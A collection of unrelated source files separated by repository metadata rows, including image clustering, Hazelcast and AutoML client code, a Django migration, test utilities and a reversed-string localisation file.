mydir = os.path.expanduser("~/GitHub/Image-Analysis")
# Read image
img = Image.open(mydir + '/photos/test.jpg').convert('RGBA')
arr = np.array(img)
# Flatten the image into an (n_pixels, 4) RGBA feature matrix; Birch.fit
# expects a 2-D array of samples, so a plain ravel() would not work.
X = arr.reshape(-1, arr.shape[-1]).astype(float)
fig = plt.figure()
plt.imshow(img, cmap=plt.cm.gray)
plt.savefig(mydir + '/results/photos/image_as_analyzable_object.png')
# Compute clustering with Birch
# The loop over several Birch configurations was left commented out, so
# fit a single model directly.
birch_model = Birch(threshold=1.7, n_clusters=None)
t1 = time()
birch_model.fit(X)
t2 = time()
print("Birch took %0.2f seconds" % (t2 - t1))
# Plot result
labels = birch_model.labels_
centroids = birch_model.subcluster_centers_
n_clusters = np.unique(labels).size
print("n_clusters : %d" % n_clusters)
fig = plt.figure()  # new figure: the first one holds the raw image
ax = fig.add_subplot(1, 1, 1)
# ``colors`` is the matplotlib.colors module and is not iterable itself;
# cycle through its named colors instead.
colour_cycle = cycle(colors.cnames.keys())
for this_centroid, k, col in zip(centroids, range(n_clusters), colour_cycle):
mask = labels == k
ax.plot(X[mask, 0], X[mask, 1], 'w',
markerfacecolor=col, marker='.')
if birch_model.n_clusters is None:
ax.plot(this_centroid[0], this_centroid[1], '+', markerfacecolor=col,
markeredgecolor='k', markersize=5)
# Rely on autoscaling: RGBA channel values span 0-255, so the hard-coded
# [-25, 25] limits inherited from the sklearn demo would show an empty plot.
ax.set_title('Birch clustering (threshold=1.7)')
# Save with matplotlib rather than cv2 (``fig`` is a Figure, not an array).
fig.savefig(mydir + '/results/photos/using_scikit_learn_clustering.png')
| mit | -2,141,438,698,161,400,000 | 26.473684 | 78 | 0.697318 | false | 2.847273 | false | false | false |
hazelcast/hazelcast-python-client | hazelcast/protocol/codec/transactional_set_remove_codec.py | 1 | 1225 | from hazelcast.serialization.bits import *
from hazelcast.protocol.builtin import FixSizedTypesCodec
from hazelcast.protocol.client_message import OutboundMessage, REQUEST_HEADER_SIZE, create_initial_buffer, RESPONSE_HEADER_SIZE
from hazelcast.protocol.builtin import StringCodec
from hazelcast.protocol.builtin import DataCodec
# hex: 0x100200
_REQUEST_MESSAGE_TYPE = 1049088
# hex: 0x100201
_RESPONSE_MESSAGE_TYPE = 1049089
_REQUEST_TXN_ID_OFFSET = REQUEST_HEADER_SIZE
_REQUEST_THREAD_ID_OFFSET = _REQUEST_TXN_ID_OFFSET + UUID_SIZE_IN_BYTES
_REQUEST_INITIAL_FRAME_SIZE = _REQUEST_THREAD_ID_OFFSET + LONG_SIZE_IN_BYTES
_RESPONSE_RESPONSE_OFFSET = RESPONSE_HEADER_SIZE
def encode_request(name, txn_id, thread_id, item):
buf = create_initial_buffer(_REQUEST_INITIAL_FRAME_SIZE, _REQUEST_MESSAGE_TYPE)
FixSizedTypesCodec.encode_uuid(buf, _REQUEST_TXN_ID_OFFSET, txn_id)
FixSizedTypesCodec.encode_long(buf, _REQUEST_THREAD_ID_OFFSET, thread_id)
StringCodec.encode(buf, name)
DataCodec.encode(buf, item, True)
return OutboundMessage(buf, False)
def decode_response(msg):
initial_frame = msg.next_frame()
return FixSizedTypesCodec.decode_boolean(initial_frame.buf, _RESPONSE_RESPONSE_OFFSET)
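# Usage sketch (not part of the generated file; names other than the two
# codec functions are hypothetical): the client's transactional set proxy
# encodes a request, sends it over the connection, and decodes the reply.
#
#     request = encode_request("my-set", txn_id, thread_id, item_data)
#     response = invocation_service.invoke(request)  # transport layer, assumed
#     removed = decode_response(response)            # True if the item was removed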
| apache-2.0 | -3,358,503,309,228,034,600 | 41.241379 | 127 | 0.781224 | false | 3.165375 | false | false | false |
googleapis/googleapis-gen | google/cloud/automl/v1/automl-v1-py/google/cloud/automl_v1/services/auto_ml/pagers.py | 1 | 15766 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.automl_v1.types import dataset
from google.cloud.automl_v1.types import model
from google.cloud.automl_v1.types import model_evaluation
from google.cloud.automl_v1.types import service
class ListDatasetsPager:
"""A pager for iterating through ``list_datasets`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListDatasetsResponse` object, and
provides an ``__iter__`` method to iterate through its
``datasets`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListDatasets`` requests and continue to iterate
through the ``datasets`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListDatasetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., service.ListDatasetsResponse],
request: service.ListDatasetsRequest,
response: service.ListDatasetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListDatasetsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListDatasetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListDatasetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[service.ListDatasetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[dataset.Dataset]:
for page in self.pages:
yield from page.datasets
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatasetsAsyncPager:
"""A pager for iterating through ``list_datasets`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListDatasetsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``datasets`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListDatasets`` requests and continue to iterate
through the ``datasets`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListDatasetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[service.ListDatasetsResponse]],
request: service.ListDatasetsRequest,
response: service.ListDatasetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListDatasetsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListDatasetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListDatasetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[service.ListDatasetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[dataset.Dataset]:
async def async_generator():
async for page in self.pages:
for response in page.datasets:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListModelsPager:
"""A pager for iterating through ``list_models`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListModelsResponse` object, and
provides an ``__iter__`` method to iterate through its
``model`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListModels`` requests and continue to iterate
through the ``model`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListModelsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., service.ListModelsResponse],
request: service.ListModelsRequest,
response: service.ListModelsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListModelsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListModelsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListModelsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[service.ListModelsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[model.Model]:
for page in self.pages:
yield from page.model
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListModelsAsyncPager:
"""A pager for iterating through ``list_models`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListModelsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``model`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListModels`` requests and continue to iterate
through the ``model`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListModelsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[service.ListModelsResponse]],
request: service.ListModelsRequest,
response: service.ListModelsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListModelsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListModelsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListModelsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[service.ListModelsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[model.Model]:
async def async_generator():
async for page in self.pages:
for response in page.model:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListModelEvaluationsPager:
"""A pager for iterating through ``list_model_evaluations`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListModelEvaluationsResponse` object, and
provides an ``__iter__`` method to iterate through its
``model_evaluation`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListModelEvaluations`` requests and continue to iterate
through the ``model_evaluation`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListModelEvaluationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., service.ListModelEvaluationsResponse],
request: service.ListModelEvaluationsRequest,
response: service.ListModelEvaluationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListModelEvaluationsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListModelEvaluationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListModelEvaluationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[service.ListModelEvaluationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[model_evaluation.ModelEvaluation]:
for page in self.pages:
yield from page.model_evaluation
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListModelEvaluationsAsyncPager:
"""A pager for iterating through ``list_model_evaluations`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListModelEvaluationsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``model_evaluation`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListModelEvaluations`` requests and continue to iterate
through the ``model_evaluation`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListModelEvaluationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[service.ListModelEvaluationsResponse]],
request: service.ListModelEvaluationsRequest,
response: service.ListModelEvaluationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListModelEvaluationsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListModelEvaluationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListModelEvaluationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[service.ListModelEvaluationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[model_evaluation.ModelEvaluation]:
async def async_generator():
async for page in self.pages:
for response in page.model_evaluation:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
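# Usage sketch (not part of the generated file): service methods return one
# of these pagers instead of a raw response, so callers can iterate items
# across page boundaries transparently. ``AutoMlClient`` and ``parent`` are
# assumed to be set up elsewhere.
#
#     client = automl_v1.AutoMlClient()
#     for ds in client.list_datasets(parent=parent):  # a ListDatasetsPager
#         print(ds.name)  # additional pages are fetched lazily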
| apache-2.0 | -2,445,530,751,282,038,300 | 39.739018 | 95 | 0.64544 | false | 4.45745 | false | false | false |
feigaochn/leetcode | p263_ugly_number.py | 2 | 1435 | # coding: utf-8
# author: Fei Gao <[email protected]>
# Problem: ugly number
#
# Write a program to check whether a given number is an ugly number.
#
# Ugly numbers are positive numbers whose prime factors only include 2, 3, 5.
# For example, 6, 8 are ugly while 14 is not ugly since it includes another
# prime factor 7.
#
# Note that 1 is typically treated as an ugly number.
#
# Credits:Special thanks to @jianchao.li.fighter for adding this problem and
# creating all test cases.
#
# Subscribe to see which companies asked this question
#
# Show Tags
#
# Math
#
# Show Similar Problems
#
# (E) Happy Number
# (E) Count Primes
# (M) Ugly Number II
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
if num < 1:
return False
if num == 1:
return True
ps = [2, 3, 5]
for p in ps:
while num % p == 0: num //= p
return num == 1
def main():
solver = Solution()
tests = [
((1,), True),
((2,), True),
((14,), False),
((-1,), False),
]
for params, expect in tests:
print('-' * 5 + 'TEST' + '-' * 5)
print('Input: ' + str(params))
print('Expect: ' + str(expect))
result = solver.isUgly(*params)
print('Result: ' + str(result))
pass
if __name__ == '__main__':
main()
pass
| mit | -5,159,015,496,010,155,000 | 20.41791 | 77 | 0.549129 | false | 3.337209 | false | false | false |
magicsky/nodechalk | chalk/Chalk.py | 1 | 2205 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8 ff=unix ft=python
"""
@author: Wu Liang
@contact: [email protected]
@date: 2015/05/09
"""
from __future__ import absolute_import
from types import ModuleType
import sys
from chalk.SupportedColor import isSupportColor
class Chalk(ModuleType):
def __init__(self, selfModule):
self.selfModule = selfModule
self.styles = {
"modifiers": {
"reset": [0, 0],
"bold": [1, 22], # 21 isn't widely supported and 22 does the same thing
"dim": [2, 22],
"italic": [3, 23],
"underline": [4, 24],
"inverse": [7, 27],
"hidden": [8, 28],
"strikethrough": [9, 29]
},
"colors": {
"black": [30, 39],
"red": [31, 39],
"green": [32, 39],
"yellow": [33, 39],
"blue": [34, 39],
"magenta": [35, 39],
"cyan": [36, 39],
"white": [37, 39],
"gray": [90, 39]
},
"bgColors": {
"bgBlack": [40, 49],
"bgRed": [41, 49],
"bgGreen": [42, 49],
"bgYellow": [43, 49],
"bgBlue": [44, 49],
"bgMagenta": [45, 49],
"bgCyan": [46, 49],
"bgWhite": [47, 49]
}
}
def __getattr__(self, style):
def colorIt(s):
found = None
colored = s
for key in self.styles.keys():
value = self.styles[key]
for name in value.keys():
values = value[name]
if name != style:
continue
found = values
if isSupportColor() and found is not None:
colored = str(u'\u001b[') + str(found[0]) + "m" + s + str(u'\u001b[') + str(found[1]) + "m"
return colored
return colorIt
self = sys.modules[__name__]
sys.modules[__name__] = Chalk(self)
| mit | 8,145,812,429,696,313,000 | 28.797297 | 107 | 0.423583 | false | 3.834783 | false | false | false |
Net-ng/kansha | kansha/card_addons/label/models.py | 2 | 1149 | # -*- coding:utf-8 -*-
#--
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
#--
from elixir import using_options
from elixir import ManyToOne, ManyToMany
from elixir import Field, Unicode, Integer
from kansha.models import Entity
class DataLabel(Entity):
"""Label mapper
"""
using_options(tablename='label')
title = Field(Unicode(255))
color = Field(Unicode(255))
board = ManyToOne('DataBoard')
cards = ManyToMany('DataCard', tablename='label_cards__card_labels')
index = Field(Integer)
def copy(self):
new_data = DataLabel(title=self.title,
color=self.color,
index=self.index)
return new_data
def remove(self, card):
self.cards.remove(card)
def add(self, card):
self.cards.append(card)
@classmethod
def get_by_card(cls, card):
q = cls.query
q = q.filter(cls.cards.contains(card))
return q.order_by(cls.index)
| bsd-3-clause | 4,538,223,466,102,745,000 | 24.533333 | 72 | 0.630983 | false | 3.706452 | false | false | false |
sciunto/scifig | libscifig/database.py | 1 | 2161 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import os.path
import hashlib
try:
import cPickle as pickle
except:
import pickle
def _calculate_checksum(filepath):
hasher = hashlib.md5()
with open(filepath, 'rb') as afile:
buf = afile.read()
hasher.update(buf)
return hasher.hexdigest()
def check_modification(name, dependencies, db_path):
"""
Check if at least one dependency changed.
:param name: name of the figure
:param dependencies: list of dependencies
:param db_path: path of the database
:returns: boolean
"""
logging.debug('Check modification for %s', name)
if not os.path.isfile(db_path):
logging.debug('No db, modif is True')
return True
cur_signature = {}
for dep in dependencies:
cur_signature[dep] = _calculate_checksum(dep)
with open(db_path, 'rb') as fh:
db = pickle.load(fh)
db = db.get(name)
if db is None:
logging.debug('name unknown in db, modif is True')
return True
for dep, md5 in cur_signature.items():
value = db.get(dep)
if value is None or value != md5:
logging.debug('value of %s is None or does not match, modif is True', dep)
return True
return False
def store_checksum(name, dependencies, db_path):
"""
Store the checksum in the db.
:param name: name of the figure
:param dependencies: list of dependencies
:param db_path: path of the database
"""
logging.debug('Store checksums in db')
# Calculate md5 sums
cur_signature = {}
for dep in dependencies:
cur_signature[dep] = _calculate_checksum(dep)
try:
with open(db_path, 'rb') as fh:
db = pickle.load(fh)
except FileNotFoundError:
db = {}
# Merge dict
db[name] = cur_signature
with open(db_path, 'wb') as fh:
pickle.dump(db, fh)
def erase_db(db_path):
"""
Erase a database.
:param db_path: path of the database
"""
logging.debug('Erase db')
with open(db_path, 'wb') as fh:
pickle.dump({}, fh)
| gpl-3.0 | 4,511,459,496,460,730,000 | 25.353659 | 90 | 0.600648 | false | 3.764808 | false | false | false |
hemio-ev/hamsql | test/utils.py | 2 | 3772 | import psycopg2
import subprocess
import time
import os.path
dburl = "postgres://postgres@/hamsql-test"
dburl_invalid = "postgres://postgresX@/hamsql-test"
def run(cmd, setup, delete_db=False, capture=False, invalid_connection=False, args=[]):
global dburl
settings = {}
path = 'hamsql'
params = [path, cmd, '-s', 'setups/' + setup]
if invalid_connection:
params += ['-c', dburl_invalid]
elif cmd != 'doc':
params += ['-c', dburl]
params += args
if delete_db:
params += [
'--permit-data-deletion',
'--delete-existing-database',
'--delete-residual-roles'
]
if capture:
settings.update({
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'universal_newlines': True
})
return subprocess.run(params, **settings)
def runAssertSilent(cmd, setup, **xs):
completedProcess = run(cmd, setup, capture=True, **xs)
assertSilent(completedProcess)
return completedProcess
def assertSilent(completedProcess):
assert completedProcess.returncode == 0
assert completedProcess.stdout == ""
assert completedProcess.stderr == ""
def assertError(completedProcess, err):
assert completedProcess.returncode == 1
assert completedProcess.stdout == ""
assert err in completedProcess.stderr
def assertStdErr(completedProcess, err):
assert completedProcess.returncode == 0
assert completedProcess.stdout == ""
assert err in completedProcess.stderr
def assertStdOut(completedProcess, out):
assert completedProcess.returncode == 0
assert out in completedProcess.stdout
assert completedProcess.stderr == ""
def check(domains=[], functions=[], tables=[], roles=[]):
conn, cur = db_open()
assert sorted(domains) == sorted(db_domains(cur))
assert sorted(functions) == sorted(db_functions(cur))
assert sorted(tables) == sorted(db_tables(cur))
assert sorted(roles) == sorted(db_roles(cur))
db_close(conn, cur)
def db_open():
global dburl
conn = psycopg2.connect(dburl + '?application_name=pytest')
cur = conn.cursor()
return conn, cur
def db_close(conn, cur):
cur.close()
conn.close()
def db_roles(cur):
cur.execute("""
SELECT
rolname
,rolsuper
,rolinherit
,rolcreaterole
,rolcreatedb
,rolcanlogin
,rolconnlimit
,rolbypassrls
,rolconfig
FROM
pg_catalog.pg_roles
WHERE rolname LIKE 'hamsql-test_%'
""")
return cur.fetchall()
def db_domains(cur):
cur.execute("""
SELECT domain_catalog, domain_name, domain_schema, udt_name, character_maximum_length, domain_default
FROM information_schema.domains
WHERE domain_schema <> 'information_schema'
""")
return cur.fetchall()
def db_tables(cur):
cur.execute("""
SELECT table_schema, table_name, table_type
FROM information_schema.tables
WHERE table_schema NOT IN ('information_schema', 'pg_catalog')
""")
return cur.fetchall()
def db_functions(cur):
cur.execute("""
SELECT
n.nspname
,p.proname
,ARRAY(SELECT UNNEST(p.proargtypes::regtype[]::varchar[]))
,prorettype::regtype::varchar
,proargnames
,prosecdef
FROM pg_catalog.pg_proc AS p
JOIN pg_namespace AS n ON p.pronamespace = n.oid AND
NOT n.nspname LIKE 'pg_%' AND
n.nspname NOT IN ('information_schema')
WHERE p.probin IS NULL
""")
return cur.fetchall()
| gpl-3.0 | 4,227,699,176,388,237,300 | 27.575758 | 109 | 0.599682 | false | 4.082251 | false | false | false |
moodpulse/l2 | api/parse_file/views.py | 1 | 1663 | import tempfile
from django.http import HttpRequest, JsonResponse
from api.parse_file.pdf import extract_text_from_pdf
import simplejson as json
from api.views import endpoint
from appconf.manager import SettingManager
def dnk_covid(request):
prefixes = []
key_dnk = SettingManager.get("dnk_kovid", default='false', default_type='s')
to_return = None
for x in "ABCDEF":
prefixes.extend([f"{x}{i}" for i in range(1, 13)])
file = request.FILES['file']
if file.content_type == 'application/pdf' and file.size < 100000:
with tempfile.TemporaryFile() as fp:
fp.write(file.read())
text = extract_text_from_pdf(fp)
if text:
text = text.replace("\n", "").split("Коронавирусы подобные SARS-CoVВККоронавирус SARS-CoV-2")
to_return = []
if text:
for i in text:
k = i.split("N")
if len(k) > 1 and k[1].split(" ")[0].isdigit():
result = json.dumps({"pk": k[1].split(" ")[0], "result": [{"dnk_SARS": "Положительно" if "+" in i else "Отрицательно"}]})
to_return.append({"pk": k[1].split(" ")[0], "result": "Положительно" if "+" in i else "Отрицательно"})
http_func({"key": key_dnk, "result": result}, request.user)
return to_return
def http_func(data, user):
http_obj = HttpRequest()
http_obj.POST.update(data)
http_obj.user = user
endpoint(http_obj)
def load_file(request):
results = dnk_covid(request)
return JsonResponse({"ok": True, "results": results})
| mit | 6,391,463,727,328,777,000 | 35.790698 | 141 | 0.596713 | false | 3.077821 | false | false | false |
ska-sa/katdal | katdal/flags.py | 1 | 1652 | ################################################################################
# Copyright (c) 2019, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""Definitions of flag bits"""
NAMES = ('reserved0', 'static', 'cam', 'data_lost',
'ingest_rfi', 'predicted_rfi', 'cal_rfi', 'postproc')
DESCRIPTIONS = ('reserved - bit 0',
'predefined static flag list',
'flag based on live CAM information',
'no data was received',
'RFI detected in ingest',
'RFI predicted from space based pollutants',
'RFI detected in calibration',
'some correction/postprocessing step could not be applied')
STATIC_BIT = 1
CAM_BIT = 2
DATA_LOST_BIT = 3
INGEST_RFI_BIT = 4
PREDICTED_RFI_BIT = 5
CAL_RFI_BIT = 6
POSTPROC_BIT = 7
STATIC = 1 << STATIC_BIT
CAM = 1 << CAM_BIT
DATA_LOST = 1 << DATA_LOST_BIT
INGEST_RFI = 1 << INGEST_RFI_BIT
PREDICTED_RFI = 1 << PREDICTED_RFI_BIT
CAL_RFI = 1 << CAL_RFI_BIT
POSTPROC = 1 << POSTPROC_BIT
| bsd-3-clause | 3,509,311,591,821,161,000 | 36.545455 | 80 | 0.6023 | false | 3.84186 | false | false | false |
rakvat/direktkreditverwaltung | dkapp/migrations/0003_auto_20200728_1929.py | 1 | 2115 | # Generated by Django 3.0.8 on 2020-07-28 17:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dkapp', '0002_auto_20200726_1744'),
]
operations = [
migrations.AlterField(
model_name='accountingentry',
name='created_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='accountingentry',
name='date',
field=models.DateField(),
),
migrations.AlterField(
model_name='accountingentry',
name='updated_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contact',
name='created_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contact',
name='updated_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contract',
name='created_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contract',
name='updated_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contractversion',
name='created_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contractversion',
name='duration_months',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='contractversion',
name='duration_years',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='contractversion',
name='start',
field=models.DateField(),
),
migrations.AlterField(
model_name='contractversion',
name='updated_at',
field=models.DateTimeField(),
),
]
| gpl-3.0 | -7,953,272,076,920,990,000 | 27.972603 | 61 | 0.526714 | false | 5 | false | false | false |
riolet/SAM | sam/local/rv.py | 2 | 2842 | map_title = "Pam"
meta_title = "Tsoh Sliated"
stats_title = "Stats"
table_title = "Elbat Weiv"
login_title = "Nigol"
settings_title = "Sngittes"
dashboard_title = "Draobhsad"
units_role_cc = "tneilc"
units_role_c = "yltsom tneilc"
units_role_cs = "dexim tneilc/revres"
units_role_s = "yltsom revres"
units_role_ss = "revres"
units_kilo = "K"
units_mega = "M"
units_giga = "G"
units_bytes = "B" # bytes
units_kbytes = "BK"
units_mbytes = "BM"
units_gbytes = "BG"
units_tbytes = "BT"
units_bps = "B/s" # bytes per second
units_kbps = "BK/s"
units_mbps = "BM/s"
units_gbps = "BG/s"
units_tbps = "BT/s"
units_pps = "p/s" # packets per second
units_kpps = "pK/s"
units_mpps = "pM/s"
units_gpps = "pG/s"
units_tpps = "pT/s"
stats_udips = "Euqinu noitanitsed PI sesserdda:"
stats_usips = "Euqinu ecruos PI sesserdda:"
stats_uips = "Euqinu PI sesserdda:"
stats_ports = "Euqinu noitanitsed strop desu:"
stats_sports = "Euqinu metsys strop desu (0..1023):"
stats_uports = "Euqinu resu strop desu (1024..49151):"
stats_pports = "Euqinu etavirp strop desu (49152..65535):"
stats_ports_max = "Xam strop rof eno noitanitsed:"
stats_ports_few = "Tnecrep fo snoitanitsed htiw rewef naht 10 strop: "
stats_conns = "Latot rebmun fo tcnitsid snoitcennoc (edon -> edon:trop) derots:"
stats_conns_many = "Rebmun fo tcnitsid snoitcennoc gnirrucco erom naht 100 semit:"
stats_hosts = "Latot stsoh dedrocer"
stats_overall = "Llarevo"
stats_datasource = "Ecruosatad: {}"
table_col_address = "Sserdda"
table_col_alias = "Enamtsoh"
table_col_conn_in = "Latot dnuobni snoitcennoc"
table_col_conn_out = "Latot fnuobtuo snoitcennoc"
table_col_role = "Elor (0 = tneilc, 1 = revres)"
table_col_environment = "Tnemnorivne"
table_col_tags = "Sgat"
table_col_bytes = "Setyb deldnah"
table_col_packets = "Stekcap deldnah"
table_col_protocols = "Desu Slocotorp"
table_proto_i = "(ni)" # in (inbound)
table_proto_o = "(tuo)" # out (outbound)
table_proto_io = "(i/o)" # in / out
table_spread = "Stluser: {0} ot {1}"
table_spread_none = "On gnihctam stluser."
meta_none = "On tsoh dnuof ta siht sserdda"
meta_src = "Ecruos PI"
meta_dst = "Tsed. PI"
meta_port = "Tsed. Trop"
meta_ports = "Trop Dessecca"
meta_links = "Tnuoc / Nim"
meta_protocols = "Slocotorp"
meta_sum_bytes = "Mus Setyb"
meta_avg_bytes = "Gva Setyb"
meta_sum_packets = "Mus Stekcap"
meta_avg_packets = "Gva Stekcap"
meta_avg_duration = "Gva Noitarud"
meta_child_ip = "Sserdda"
meta_child_name = "Eman"
